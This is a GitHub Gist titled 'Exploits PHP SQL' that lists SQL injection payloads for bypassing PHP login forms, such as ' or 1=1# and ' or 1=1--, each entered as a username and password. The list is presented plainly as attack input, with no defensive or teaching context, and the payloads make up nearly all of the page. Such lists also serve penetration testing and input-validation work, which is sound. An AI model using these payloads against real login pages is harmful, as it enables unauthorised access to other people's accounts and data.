Last active
July 6, 2017 20:53
-
-
Save dsebao/80d822f8b22eed6d8c7d31280646b2c6 to your computer and use it in GitHub Desktop.
Exploits PHP SQL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| In login: | |
| Username: ' or 1=1# | |
| Password: no-deface | |
| or | |
| ' or 1=1 or ''='' | |
| or | |
| User: ' or 1=1)# | |
| PW: notimportant | |
| Username: ' or 1=1-- | |
| Password: ' or 1=1-- | |
| username : x' or ' 1=1 | |
| password : x' or ' 1=1 | |
| or | |
| 'or 1=1/* | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment